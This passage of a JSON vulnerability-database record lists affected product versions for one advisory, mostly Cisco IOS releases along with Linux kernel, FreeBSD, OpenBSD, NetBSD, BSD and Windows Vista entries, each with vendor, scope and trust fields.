        "vendor": "cisco",
        "version": "12.2\\(15\\)mc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2by"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)t17"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(4\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(8.9\\)sa6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(2\\)xf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5c\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.49"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(14\\)e4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(3h\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)e17"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(18b\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(7\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yd"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20\\)sp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(8\\)t1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "7.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)t9"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.62"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)bx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(12\\)s4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)xr"
      },
      {
        "model": "bsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsd",
        "version": "4.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(11\\)st4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)xr4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)xl4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xm4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(4\\)xa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)b4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)fy"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.1"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)st5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yn"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "5.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xh"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.28"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(10\\)w5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(14\\)ea1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)ew3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4t"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "5.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)jx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yi"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)t10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20.4\\)sp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yh"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "2.0.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(16f\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xk4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)eu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(5\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.1.132"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(9d\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)s7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)b3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0\\(22a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)yq4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)bx"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(8\\)sa5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(8\\)sa1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20\\)sp1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)t4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.22"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(9a\\)bc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)s"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)ea1e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0sc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)yu1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)db1"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "3.99.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)e3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1ia"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1eo"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.35"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)db2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)yw3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yi3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.25"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(27\\)sv"
      },
      {
        "model": "catalyst blade switch 3120x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(50\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zh3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(22\\)ea6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ey"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0sx"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "7.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)ea1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yb"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0dc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yb"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.21"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(23\\)e1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17\\)a"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)yz2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(2\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2mc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)mb3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ew"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.21"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "0.4_1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(6\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)b"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "6.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1az"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8b\\)ex4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(1\\)w"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8a\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ym"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1cc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(6c\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)t15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ewa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2mx"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1yi"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(26\\)e3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)yw2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(11c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12i\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)cx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)t8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4mr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(10\\)da2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16.06\\)s"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8\\)aa1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(27\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(23\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)t1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)s8"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)za8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xi"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.33"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(5\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(7\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(7.4\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(9\\)"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "1.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(11\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(23\\)s6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(9\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(2\\)xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(9a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3na"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8b\\)e18"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(8\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(16\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)ea3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ea"
      },
      {
        "model": "windows vista",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(36\\)ca2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xu1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(17\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(15\\)s3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)e12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yg2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12.05\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)s4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13.03\\)b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.19"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)zb7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0\\(17\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(4\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ya"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3j"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sec1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11a\\)"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(28d\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.49"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)by2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "9.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.30"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(28a\\)ia"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "ios",
        "scope": "eq",
